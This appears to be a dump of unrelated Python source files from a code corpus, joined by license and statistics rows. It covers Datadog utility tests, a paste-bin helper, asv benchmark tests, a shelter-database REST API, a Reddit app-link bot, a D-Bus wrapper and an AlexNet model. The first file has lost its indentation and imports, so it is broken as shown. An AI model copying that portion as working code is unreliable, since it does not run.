from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import hash_mutable, iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
@pytest.mark.parametrize(
'value',
[
pytest.param({'x': 'y'}, id='dict'),
pytest.param({'x': 'y', 'z': None}, id='dict-with-none-value'),
pytest.param({'x': 'y', None: 't'}, id='dict-with-none-key'),
pytest.param({'x': ['y', 'z'], 't': 'u'}, id='dict-nest-list'),
pytest.param(['x', 'y'], id='list'),
pytest.param(['x', None], id='list-with-none'),
pytest.param(('x', None), id='tuple-with-none'),
pytest.param({'x', None}, id='set-with-none'),
],
)
def test_hash_mutable(self, value):
h = hash_mutable(value)
assert isinstance(h, int)
@pytest.mark.skipif(
PY2,
reason="In Python 2, a < b when a and b are of different types returns `False` (does not raise `TypeError`)",
)
@pytest.mark.parametrize(
'value',
[
pytest.param(['x', 1], id='mixed-list'),
pytest.param(['x', [1, 2, 3]], id='mixed-list-nested-1'),
pytest.param(['x', {'y': 'z'}], id='mixed-list-nested-2'),
pytest.param(('x', 1), id='mixed-tuple'),
pytest.param({'x', 1}, id='mixed-set'),
pytest.param({'x': 1, 2: 'y'}, id='mixed-dict-keys'),
],
)
def test_hash_mutable_unsupported_mixed_type(self, value):
"""
Hashing mixed type containers is not supported, mostly because we haven't needed to add support for it yet.
"""
with pytest.raises(TypeError):
hash_mutable(value)
@pytest.mark.parametrize(
'left, right',
[
pytest.param([1, 2], [2, 1], id='top-level'),
pytest.param({'x': [1, 2]}, {'x': [2, 1]}, id='nested'),
],
)
def test_hash_mutable_commutative(self, left, right):
"""
hash_mutable() is expected to return the same hash regardless of the order of items in the container.
"""
assert hash_mutable(left) == hash_mutable(right)
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = 's3kr3t'
pwd2 = 'admin123'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
| bsd-3-clause | 6,135,690,517,738,410,000 | 32.790514 | 120 | 0.566031 | false | 3.5532 | true | false | false |
hmngwy/pipebin | helpers.py | 1 | 1045 | import datetime
import config
import random
import string
import os
import gnupg
textchars = bytearray({7,8,9,10,12,13,27} | set(range(0x20, 0x100)) - {0x7f})
is_binary_string = lambda bytes: bool(bytes.translate(None, textchars))
def log_to_stdout(message):
time_now = str(datetime.datetime.now()).split('.')[0]
print('[{0}] {1}'.format(time_now, message))
def path_gen(slug):
return config.store_dir + '/' + slug
def slug_gen(size=6, chars=string.ascii_lowercase + string.digits):
slug = ''.join(random.choice(chars) for _ in range(size))
if os.path.exists(path_gen(slug)):
slug = slug_gen(6, chars)
return slug
def save_file(slug, string):
with open(path_gen(slug), "wb") as out:
out.write(string)
def create_gpg():
gpghome = config.gpghome + '/' + slug_gen(4)
os.makedirs(gpghome)
open(gpghome + '/gpg.conf', 'a').close()
os.chmod(gpghome + '/gpg.conf', 0o600)
os.chmod(gpghome, 0o700)
gpg = gnupg.GPG(gnupghome = gpghome)
gpg.list_keys()
return gpg, gpghome
| gpl-2.0 | 6,882,945,678,450,637,000 | 28.027778 | 77 | 0.650718 | false | 2.910864 | false | false | false |
spacetelescope/asv | test/test_find.py | 3 | 1999 | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import sys
import pytest
from asv.util import check_output, which
from . import tools
from .test_workflow import generate_basic_conf
WIN = (os.name == 'nt')
def test_find(capfd, tmpdir):
values = [
(None, None),
(1, 1),
(3, 1),
(None, 1),
(6, None),
(5, 1),
(6, 1),
(6, 1),
(6, 6),
(6, 6),
]
tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False)
# Test find at least runs
tools.run_asv_with_conf(conf, 'find', "master~5..master", "params_examples.track_find_test",
_machine_file=machine_file)
# Check it found the first commit after the initially tested one
output, err = capfd.readouterr()
regression_hash = check_output(
[which('git'), 'rev-parse', 'master^'], cwd=conf.repo)
assert "Greatest regression found: {0}".format(regression_hash[:8]) in output
@pytest.mark.flaky(reruns=1, reruns_delay=5) # depends on a timeout
def test_find_timeout(capfd, tmpdir):
values = [
(1, 0),
(1, 0),
(1, -1)
]
tmpdir, local, conf, machine_file = generate_basic_conf(tmpdir, values=values, dummy_packages=False)
# Test find at least runs
tools.run_asv_with_conf(conf, 'find', "-e", "master", "params_examples.time_find_test_timeout",
_machine_file=machine_file)
# Check it found the first commit after the initially tested one
output, err = capfd.readouterr()
regression_hash = check_output(
[which('git'), 'rev-parse', 'master'], cwd=conf.repo)
assert "Greatest regression found: {0}".format(regression_hash[:8]) in output
assert "asv: benchmark timed out (timeout 1.0s)" in output
| bsd-3-clause | -502,191,799,437,568,300 | 27.15493 | 104 | 0.604302 | false | 3.446552 | true | false | false |
rodekruis/shelter-database | src/web/views/api/shelter_api_v01.py | 2 | 3676 | #! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
from bootstrap import app, manager
from web import models
from web import processors
# 'User' Web service
blueprint_user = manager.create_api_blueprint(models.User,
exclude_columns=['pwdhash'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
GET_SINGLE=[processors.auth_func],
GET_MANY=[processors.auth_func],
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'Shelter' Web service
blueprint_shelter = manager.create_api_blueprint(models.Shelter,
exclude_columns=['user_id', 'responsible.pwdhash',
'responsible.email'],
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
POST=[processors.auth_func,
processors.shelter_POST_preprocessor],
DELETE=[processors.auth_func]))
# 'ShelterPicture' Web service
blueprint_shelter_picture = manager.create_api_blueprint(models.ShelterPicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Section' Web service
blueprint_section = manager.create_api_blueprint(models.Section,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Category' Web service
blueprint_category = manager.create_api_blueprint(models.Category,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Attribute' Web service
blueprint_attribute = manager.create_api_blueprint(models.Attribute,
methods=['GET', 'POST', 'PUT', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000)
# 'AttributePicture' Web service
blueprint_attribute_picture = manager.create_api_blueprint(models.AttributePicture,
methods=['GET', 'POST', 'PUT', 'DELETE'])
# 'Value' Web service
blueprint_value = manager.create_api_blueprint(models.Value,
methods=['GET', 'POST', 'PUT', 'DELETE'],
preprocessors=dict(
PUT_SINGLE=[processors.value_edit_preprocessor],
PUT_MANY=[processors.value_edit_preprocessor]
))
# 'Property' Web service
blueprint_property = manager.create_api_blueprint(models.Property,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'],
results_per_page = 10000000,
max_results_per_page = 10000000,
preprocessors=dict(
POST=[processors.auth_func,
processors.property_preprocessor],
PUT=[processors.auth_func,
processors.property_preprocessor],
DELETE=[processors.auth_func]))
# 'Page' Web service
blueprint_page = manager.create_api_blueprint(models.Page,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
# 'Translation' Web service
blueprint_translation = manager.create_api_blueprint(models.Translation,
methods=['GET', 'POST', 'PUT', 'PATCH', 'DELETE'])
| mit | -5,800,293,617,874,024,000 | 35.510204 | 83 | 0.527476 | false | 4.504902 | false | true | false |
iAmMrinal0/wpstore-reddit-bot | wpstorebot.py | 1 | 4862 | import praw
import OAuth2Util
import requests
import re
import time
from bs4 import BeautifulSoup
STORE_LINK = "https://www.windowsphone.com/en-us/search"
SUBREDDIT = ""
SLEEP = 60
BOT_BY = """------
^Bot ^by ^[/u/iammrinal0](/user/iammrinal0)"""
def get_url(app_name):
set_of_links = ""
ctrl = 0
heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)"
" Gecko/20100101 Firefox/36.0"}
results = requests.get(STORE_LINK, params={"q": app_name},
headers=heads)
soup = BeautifulSoup(results.content, "html.parser")
for tag in soup.find_all("a", {"data-os": True}):
if tag["data-os"] == "app":
if tag.string is not None:
univ_url = universal_url(tag["href"])
publisher = get_publisher(univ_url)
possible = "Possible matches for *{0}*:\n\n".format(app_name)
if publisher:
if app_name.lower() == tag.string.lower():
set_of_links += prepare_comment(
tag.string, univ_url, publisher)
break
else:
if ctrl == 0:
set_of_links += possible
set_of_links += prepare_comment(
tag.string, univ_url, publisher, True)
ctrl += 1
if ctrl == 3:
break
if not set_of_links:
set_of_links = "This app was not found: *{0}*\n\n".format(app_name)
return set_of_links
def prepare_comment(app_name, app_url, app_dev, possible=None):
tabs = ""
if possible:
tabs = "* "
return "{0}[{1}]({2}) by {3}\n\n".format(tabs, app_name, app_url, app_dev)
def get_publisher(app_url):
heads = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)"
" Gecko/20100101 Firefox/36.0"}
results = requests.get(app_url, headers=heads)
soup = BeautifulSoup(results.content, "html.parser")
publisher = soup.find("div",
{"class": "content m-b-n clamp-5"}
)
if publisher:
return publisher.text.strip()
def universal_url(url):
return "{0}s?appid={1}".format(url[:28], url[-36:])
def replied_file(comm_id):
with open("comments.txt", "a") as f:
f.write("\n")
f.write("\n".join(comm_id))
def post_comment(comment, reply, comment_submission):
if comment_submission:
comment.reply(reply)
else:
comment.add_comment(reply)
return comment.id
def get_app_name(stri):
trigger = "\w*wpapp\[([^]]*)\]"
exp = re.compile(trigger, re.I)
found = exp.findall(stri)
if found:
return found
def bot_process(text, comment_submission, replied_id):
comment_id = []
if comment_submission:
data = text.body
else:
data = text.selftext
trigger_found = get_app_name(data)
if trigger_found and not str(text.id) in replied_id:
app_names = []
for apps in trigger_found:
if any("," in s for s in apps):
name = apps.split(",")
for app_split in name:
app_names.append(app_split.strip().lower())
else:
app_names.append(apps.strip().lower())
url = ""
for name in app_names:
url += get_url(name)
if url:
print("commenting...")
done_id = post_comment(text, url + BOT_BY, comment_submission)
comment_id.append(str(done_id))
return comment_id
def main():
with open("comments.txt", "r") as f:
replied_id = f.read().splitlines()
r = praw.Reddit(user_agent="WP Store Linker v0.1 by /u/iammrinal0")
OAuth2Util.OAuth2Util(r)
sub = r.get_subreddit(SUBREDDIT)
print("Starting Bot...")
while True:
sub.refresh()
comment_id = []
for comment in sub.get_comments():
cmnt_id = bot_process(comment, True, replied_id)
if cmnt_id:
comment_id.extend(cmnt_id)
if comment_id:
print("Writing to file...")
replied_file(comment_id)
replied_id.extend(comment_id)
print("Done! Now sleeping for {0}s".format(SLEEP))
time.sleep(SLEEP)
comment_id = []
for submn in sub.get_new():
cmnt_id = bot_process(submn, False, replied_id)
if cmnt_id:
comment_id.extend(cmnt_id)
if comment_id:
print("Writing to file...")
replied_file(comment_id)
replied_id.extend(comment_id)
print("Done! Now sleeping for {0}s".format(SLEEP))
time.sleep(SLEEP)
replied_file(comment_id)
if __name__ == "__main__":
main()
| mit | 3,382,337,231,833,234,000 | 28.828221 | 78 | 0.529412 | false | 3.53343 | false | false | false |
tgcmteam/tgcmlinux | src/tgcm/contrib/freedesktopnet/dbusclient/__init__.py | 1 | 7706 | #!/usr/bin/env python
# Copyright (C) 2009 Martin Vidner
#
#
# Authors:
# Martin Vidner <martin at vidnet.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
# USA
"Convenience wrappers around dbus-python"
import dbus
import functools
# TODO rename to adaptors
from func import Adaptor, MethodAdaptor, PropertyAdaptor, SignalAdaptor
def object_path(o):
"""Return the object path of o.
If o is a proxy object, use its appropriate attribute.
Otherwise assume that o already is an object path.
"""
if isinstance(o, dbus.proxies.ProxyObject):
return o.object_path
# hope it is ok
return o
class DBusMio(dbus.proxies.ProxyObject):
"""Multi-interface object.
Will look into introspection data to find which interface
to use for a method or a property, obviating the need for
dbus.proxies.Interface.
If introspection is not available, provide default_interface
to the constructor.
BUGS: 1st method call will block with introspection"""
def __init__(self, conn=None, bus_name=None, object_path=None, introspect=True, follow_name_owner_changes=False, **kwargs):
"""Constructor.
kwargs may contain default_interface, to be used
if introspection does not provide it for a method/property
"""
self.__default_interface = kwargs.pop("default_interface", None)
super(DBusMio, self).__init__(conn, bus_name, object_path, introspect, follow_name_owner_changes, **kwargs)
def set_base_iface(self, iface):
self.__base_interface = iface
def __getattr__(self, name):
"""Proxied DBus methods.
Uses introspection or default_interface to find the interface.
"""
# TODO cache
# iface = self._interface_cache.get(name)
# if iface == None:
iface = self.__default_interface
# _introspect_method_map comes from ProxyObject
# But it will be empty until the async introspection finishes
self._introspect_block() # FIXME makeit work with async methods
methods = self._introspect_method_map.keys()
for im in methods:
(i, m) = im.rsplit(".", 1)
if m == name:
iface = i
# print "METHOD %s INTERFACE %s" %(name, iface)
callable = super(DBusMio, self).__getattr__(name)
return functools.partial(callable, dbus_interface=iface, byte_arrays=True)
# properties
def __getitem__(self, key):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
p = a["Prop"]
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
base_iface = self.__base_interface
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
try:
return pmi.Get(iface, key, byte_arrays=True)
except dbus.exceptions.DBusException, e:
if "AccessDenied" in e.get_dbus_name():
return pmi.Get(base_iface, key, byte_arrays=True)
def __setitem__(self, key, value):
"""Proxies DBus properties as dictionary items.
a = DBusMio(...)
a["Prop"] = "Hello"
Uses default_interface (because dbus.proxies.ProxyObject
does not store introspection data for properties, boo. TODO.)
"""
iface = self.__default_interface # TODO cache
# TODO _introspect_property_map
pmi = dbus.Interface(self, "org.freedesktop.DBus.Properties")
pmi_res = pmi.Set(iface, key, value, byte_arrays=True)
if not pmi_res:
return pmi.Set(base_iface, key, value, byte_arrays=True)
def _mklist(x):
"""Return a list.
Tuples are made into lists, everything else a singleton list.
"""
if isinstance(x, list):
return x
elif isinstance(x, tuple):
return [i for i in x]
else:
return [x]
class DBusClient(DBusMio):
"""
"""
_adaptors = {
"methods": {},
"signals": {},
"properties": {},
}
def set_base_iface(self, iface):
super(DBusClient, self).set_base_iface(iface)
@classmethod
def _get_adaptor(cls, kind, name):
# print "GET", cls, kind, name
try:
a = cls._adaptors[kind][name]
# print ">", a
# TODO cache somehow?
return a
except KeyError:
scls = cls.__mro__[1] # can use "super"? how?
try:
return scls._get_adaptor(kind, name)
except AttributeError: # no _get_adaptor there
raise KeyError(":".join((kind, name)))
@classmethod
def _add_adaptor(cls, kind, name, adaptor):
# print "ADD", cls, kind, name, adaptor
assert(isinstance(adaptor, Adaptor))
cls._adaptors[kind][name] = adaptor
@classmethod
def _add_adaptors_dict(cls, andict):
"""
a nested dictionary of kind:name:adaptor,
"""
if not cls.__dict__.has_key("_adaptors"):
# do not use inherited attribute
cls._adaptors = {"methods":{}, "properties":{}, "signals":{}}
for section in cls._adaptors.keys():
secsource = andict.pop(section, {})
for name, adaptor in secsource.iteritems():
cls._add_adaptor(section, name, adaptor)
assert len(andict) == 0
# print "AA", cls, cls._adaptors
@classmethod
def _add_adaptors(cls, **kwargs):
"""kwargs: a *flat* dictionary of name: adaptor"""
adict = {"methods":{}, "properties":{}, "signals":{}}
for k, v in kwargs.iteritems():
kind = v.kind()
adict[kind][k] = v
cls._add_adaptors_dict(adict)
def __getattr__(self, name):
"Wrap return values"
callable = super(DBusClient, self).__getattr__(name)
try:
adaptor = self._get_adaptor("methods", name)
return adaptor.adapt(callable)
except KeyError:
return callable
# properties
def __getitem__(self, key):
value = super(DBusClient, self).__getitem__(key)
try:
adaptor = self._get_adaptor("properties", key)
return adaptor.adapt(value)
except KeyError:
return value
def __setitem__(self, key, value):
try:
adaptor = self._get_adaptor("properties", key)
value = adaptor.adapt_write(value)
except KeyError:
pass
return super(DBusClient, self).__setitem__(key, value)
# signals
# overrides a ProxyObject method
def _connect_to_signal(self, signame, handler, interface=None, **kwargs):
"Wrap signal handler, with arg adaptors"
# TODO also demarshal kwargs
adaptor = self._get_adaptor("signals", signame)
wrap_handler = adaptor.adapt(handler)
return self.connect_to_signal(signame, wrap_handler, interface, **kwargs)
| gpl-2.0 | -9,011,943,761,378,264,000 | 32.215517 | 127 | 0.61225 | false | 3.941688 | false | false | false |
JasonHanG/tensor-gallery | alexNet-finetune/alexnet.py | 1 | 7368 | """This is an TensorFLow implementation of AlexNet by Alex Krizhevsky at all.
Paper:
(http://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf)
@original author: Frederik Kratzert (contact: f.kratzert(at)gmail.com)
"""
import tensorflow as tf
import numpy as np
class AlexNet(object):
"""Implementation of the AlexNet."""
def __init__(self, x, keep_prob, num_classes, skip_layer,
weights_path='DEFAULT'):
"""Create the graph of the AlexNet model.
Args:
x: Placeholder for the input tensor.
keep_prob: Dropout probability.
num_classes: Number of classes in the dataset.
skip_layer: List of names of the layer, that get trained from
scratch
weights_path: Complete path to the pretrained weight file, if it
isn't in the same folder as this code
"""
# Parse input arguments into class variables
self.X = x
self.NUM_CLASSES = num_classes
self.KEEP_PROB = keep_prob
self.SKIP_LAYER = skip_layer
if weights_path == 'DEFAULT':
self.WEIGHTS_PATH = 'bvlc_alexnet.npy'
else:
self.WEIGHTS_PATH = weights_path
# Call the create function to build the computational graph of AlexNet
self.create()
def create(self):
"""Create the network graph."""
# 1st Layer: Conv (w ReLu) -> Lrn -> Pool
conv1 = conv(self.X, 11, 11, 96, 4, 4, padding='VALID', name='conv1')
norm1 = lrn(conv1, 2, 2e-05, 0.75, name='norm1')
pool1 = max_pool(norm1, 3, 3, 2, 2, padding='VALID', name='pool1')
# 2nd Layer: Conv (w ReLu) -> Lrn -> Pool with 2 groups
conv2 = conv(pool1, 5, 5, 256, 1, 1, groups=2, name='conv2')
norm2 = lrn(conv2, 2, 2e-05, 0.75, name='norm2')
pool2 = max_pool(norm2, 3, 3, 2, 2, padding='VALID', name='pool2')
# 3rd Layer: Conv (w ReLu)
conv3 = conv(pool2, 3, 3, 384, 1, 1, name='conv3')
# 4th Layer: Conv (w ReLu) splitted into two groups
conv4 = conv(conv3, 3, 3, 384, 1, 1, groups=2, name='conv4')
# 5th Layer: Conv (w ReLu) -> Pool splitted into two groups
conv5 = conv(conv4, 3, 3, 256, 1, 1, groups=2, name='conv5')
pool5 = max_pool(conv5, 3, 3, 2, 2, padding='VALID', name='pool5')
# 6th Layer: Flatten -> FC (w ReLu) -> Dropout
flattened = tf.reshape(pool5, [-1, 6*6*256])
fc6 = fc(flattened, 6*6*256, 4096, name='fc6')
dropout6 = dropout(fc6, self.KEEP_PROB)
# 7th Layer: FC (w ReLu) -> Dropout
fc7 = fc(dropout6, 4096, 4096, name='fc7')
dropout7 = dropout(fc7, self.KEEP_PROB)
# 8th Layer: FC and return unscaled activations
self.fc8 = fc(dropout7, 4096, self.NUM_CLASSES, relu=False, name='fc8')
def load_initial_weights(self, session):
"""Load weights from file into network.
As the weights from http://www.cs.toronto.edu/~guerzhoy/tf_alexnet/
come as a dict of lists (e.g. weights['conv1'] is a list) and not as
dict of dicts (e.g. weights['conv1'] is a dict with keys 'weights' &
'biases') we need a special load function
"""
# Load the weights into memory
weights_dict = np.load(self.WEIGHTS_PATH, encoding='bytes').item()
# Loop over all layer names stored in the weights dict
for op_name in weights_dict:
# Check if layer should be trained from scratch
if op_name not in self.SKIP_LAYER:
with tf.variable_scope(op_name, reuse=True):
# Assign weights/biases to their corresponding tf variable
for data in weights_dict[op_name]:
# Biases
if len(data.shape) == 1:
var = tf.get_variable('biases', trainable=False)
session.run(var.assign(data))
# Weights
else:
var = tf.get_variable('weights', trainable=False)
session.run(var.assign(data))
def conv(x, filter_height, filter_width, num_filters, stride_y, stride_x, name,
padding='SAME', groups=1):
"""Create a convolution layer.
Adapted from: https://github.com/ethereon/caffe-tensorflow
"""
# Get number of input channels
input_channels = int(x.get_shape()[-1])
# Create lambda function for the convolution
convolve = lambda i, k: tf.nn.conv2d(i, k,
strides=[1, stride_y, stride_x, 1],
padding=padding)
with tf.variable_scope(name) as scope:
# Create tf variables for the weights and biases of the conv layer
weights = tf.get_variable('weights', shape=[filter_height,
filter_width,
input_channels/groups,
num_filters])
biases = tf.get_variable('biases', shape=[num_filters])
if groups == 1:
conv = convolve(x, weights)
# In the cases of multiple groups, split inputs & weights and
else:
# Split input and weights and convolve them separately
input_groups = tf.split(axis=3, num_or_size_splits=groups, value=x)
weight_groups = tf.split(axis=3, num_or_size_splits=groups,
value=weights)
output_groups = [convolve(i, k) for i, k in zip(input_groups, weight_groups)]
# Concat the convolved output together again
conv = tf.concat(axis=3, values=output_groups)
# Add biases
bias = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))
# Apply relu function
relu = tf.nn.relu(bias, name=scope.name)
return relu
def fc(x, num_in, num_out, name, relu=True):
"""Create a fully connected layer."""
with tf.variable_scope(name) as scope:
# Create tf variables for the weights and biases
weights = tf.get_variable('weights', shape=[num_in, num_out],
trainable=True)
biases = tf.get_variable('biases', [num_out], trainable=True)
# Matrix multiply weights and inputs and add bias
act = tf.nn.xw_plus_b(x, weights, biases, name=scope.name)
if relu:
# Apply ReLu non linearity
relu = tf.nn.relu(act)
return relu
else:
return act
def max_pool(x, filter_height, filter_width, stride_y, stride_x, name,
padding='SAME'):
"""Create a max pooling layer."""
return tf.nn.max_pool(x, ksize=[1, filter_height, filter_width, 1],
strides=[1, stride_y, stride_x, 1],
padding=padding, name=name)
def lrn(x, radius, alpha, beta, name, bias=1.0):
"""Create a local response normalization layer."""
return tf.nn.local_response_normalization(x, depth_radius=radius,
alpha=alpha, beta=beta,
bias=bias, name=name)
def dropout(x, keep_prob):
"""Create a dropout layer."""
return tf.nn.dropout(x, keep_prob)
| apache-2.0 | -1,476,436,430,964,266,200 | 37.176166 | 102 | 0.564332 | false | 3.761103 | false | false | false |
jgsogo/neutron | webapp/question/wordalternate/views/run_wordalternate.py | 1 | 2058 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.views.generic import TemplateView
from django.utils.translation import ugettext_lazy as _
from neutron.models import Meaning, WordAlternate, Word
from neutron.views import WordAlternateRandomMeaningRun
from ..forms import WordAlternateForm
import logging
log = logging.getLogger(__name__)
class WordAlternateHome(TemplateView):
template_name = 'wordalternate/home.html'
class WordAlternateRun(WordAlternateRandomMeaningRun):
form_class = WordAlternateForm
template_name = 'wordalternate/run.html'
def form_valid(self, form, time_elapsed=None):
meaning = Meaning.objects.get(pk=form.cleaned_data['item'])
button = form.cleaned_data['button']
word_alternate = WordAlternate(meaning=meaning)
if button == 0:
value = form.cleaned_data['value']
if not value:
# Jump to another item but keep track of error
log.error("WordAlternateRun form error, user '{}' left value field empty.".format(self.request.user))
return super(WordAlternateRun, self).form_valid(form=None)
alternate, _ = Word.objects.get_or_create(word=value)
alternate_meaning = Meaning(word=alternate, definition=meaning.definition)
alternate_meaning.informer = self.request.user.as_informer()
alternate_meaning.excluded = True # TODO: May I accept directly new words?
alternate_meaning.save()
word_alternate.value = alternate_meaning
word_alternate.informer = self.request.user.as_informer()
word_alternate.interface = self.interface
word_alternate.elapsed_time = time_elapsed
word_alternate.save()
return super(WordAlternateRun, self).form_valid(form=None)
def get_context_data(self, **kwargs):
context = super(WordAlternateRun, self).get_context_data(**kwargs)
context.update({'button_items': [(0, _("Set alternate")), (1, _("Can't remember now"))]})
return context
| gpl-2.0 | 6,908,316,499,432,080,000 | 39.352941 | 117 | 0.677357 | false | 3.93499 | false | false | false |
gordon-elliott/glod | src/glod/api/account_node.py | 1 | 1157 | __copyright__ = 'Copyright(c) Gordon Elliott 2017'
"""
"""
import graphene
from a_tuin.api import (
node_class,
node_connection_field,
get_update_mutation,
get_create_mutation,
get_local_fields
)
from glod.api.account_leaf import AccountLeaf
from glod.api.fund_node import FundLeaf
from glod.db.account import Account, AccountQuery
account_fields = get_local_fields(Account)
account_node_fields = account_fields.copy()
# TODO can we derive this from the model references?
account_node_fields['funds'] = graphene.Field(
graphene.List(FundLeaf, description='Funds for this account.')
)
AccountNode = node_class(Account.__name__, AccountLeaf, account_node_fields)
accounts_connection_field = node_connection_field(
Account,
AccountQuery,
AccountNode,
description='List of all bank accounts'
)
accounts_options_field = node_connection_field(
Account,
AccountQuery,
AccountLeaf,
description='List of all bank accounts for select fields'
)
CreateAccountLeaf = get_create_mutation(Account, account_fields, AccountLeaf)
UpdateAccountLeaf = get_update_mutation(Account, account_fields, AccountLeaf)
| mit | -5,361,489,816,740,549,000 | 24.711111 | 77 | 0.744166 | false | 3.495468 | false | false | false |
bd-j/sedpy | sedpy/attenuation.py | 1 | 12519 | import numpy as np
import warnings, sys
# --------------------
# ATTENUATION CURVES
# --------------------
